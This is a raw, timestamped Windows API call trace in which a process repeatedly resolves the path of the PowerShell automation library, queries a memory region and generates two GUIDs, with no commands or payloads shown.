	[0161.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.784] GetLastError () returned 0x0
	[0161.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.784] GetLastError () returned 0x0
	[0161.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.784] GetLastError () returned 0x0
	[0161.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.784] GetLastError () returned 0x0
	[0161.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.784] GetLastError () returned 0x0
	[0161.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.784] GetLastError () returned 0x0
	[0161.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.784] GetLastError () returned 0x0
	[0161.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.785] GetLastError () returned 0x0
	[0161.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.785] GetLastError () returned 0x0
	[0161.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.785] GetLastError () returned 0x0
	[0161.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.785] GetLastError () returned 0x0
	[0161.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.785] GetLastError () returned 0x0
	[0161.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.785] GetLastError () returned 0x0
	[0161.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.785] GetLastError () returned 0x0
	[0161.785] VirtualQuery (in: lpAddress=0xcd660, lpBuffer=0xce660, dwLength=0x1c | out: lpBuffer=0xce660*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.786] GetLastError () returned 0x0
	[0161.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.786] GetLastError () returned 0x0
	[0161.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.786] GetLastError () returned 0x0
	[0161.786] VirtualQuery (in: lpAddress=0xcd660, lpBuffer=0xce660, dwLength=0x1c | out: lpBuffer=0xce660*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.786] GetLastError () returned 0x0
	[0161.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.786] GetLastError () returned 0x0
	[0161.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.787] GetLastError () returned 0x0
	[0161.787] VirtualQuery (in: lpAddress=0xcd660, lpBuffer=0xce660, dwLength=0x1c | out: lpBuffer=0xce660*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.787] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.788] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.023] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.024] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.024] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.024] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.025] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.025] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.025] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.026] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.027] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.027] VirtualQuery (in: lpAddress=0xcd49c, lpBuffer=0xce49c, dwLength=0x1c | out: lpBuffer=0xce49c*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.027] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.029] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.029] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.029] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.029] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xdcca2460, Data2=0x8620, Data3=0x4d5b, Data4=([0]=0xa2, [1]=0x65, [2]=0xc9, [3]=0x82, [4]=0x89, [5]=0x9d, [6]=0xc4, [7]=0xa8))) returned 0x0
	[0162.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.030] GetLastError () returned 0x0
	[0162.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.030] GetLastError () returned 0x0
	[0162.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.030] GetLastError () returned 0x0
	[0162.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.030] GetLastError () returned 0x0
	[0162.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.030] GetLastError () returned 0x0
	[0162.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.031] GetLastError () returned 0x0
	[0162.031] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x8fbf257a, Data2=0x8337, Data3=0x4415, Data4=([0]=0xb5, [1]=0xc3, [2]=0x30, [3]=0x0, [4]=0xc0, [5]=0x8, [6]=0x21, [7]=0x1c))) returned 0x0
	[0162.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.031] GetLastError () returned 0x0
	[0162.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.031] GetLastError () returned 0x0
	[0162.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.031] GetLastError () returned 0x0
	[0162.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.031] GetLastError () returned 0x0
	[0162.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.031] GetLastError () returned 0x0
	[0162.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.032] GetLastError () returned 0x0
	[0162.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.032] GetLastError () returned 0x0
	[0162.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.032] GetLastError () returned 0x0
	[0162.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.032] GetLastError () returned 0x0
	[0162.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.032] GetLastError () returned 0x0
	[0162.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.033] GetLastError () returned 0x0
	[0162.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.033] GetLastError () returned 0x0
	[0162.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.033] GetLastError () returned 0x0
	[0162.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.033] GetLastError () returned 0x0
	[0162.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.033] GetLastError () returned 0x0
	[0162.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.033] GetLastError () returned 0x0
	[0162.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.033] GetLastError () returned 0x0
	[0162.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.034] GetLastError () returned 0x0
	[0162.034] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.034] GetLastError () returned 0x0
	[0162.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.034] GetLastError () returned 0x0
	[0162.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.035] GetLastError () returned 0x0
	[0162.035] VirtualQuery (in: lpAddress=0xcd254, lpBuffer=0xce254, dwLength=0x1c | out: lpBuffer=0xce254*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.035] VirtualQuery (in: lpAddress=0xcd290, lpBuffer=0xce290, dwLength=0x1c | out: lpBuffer=0xce290*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
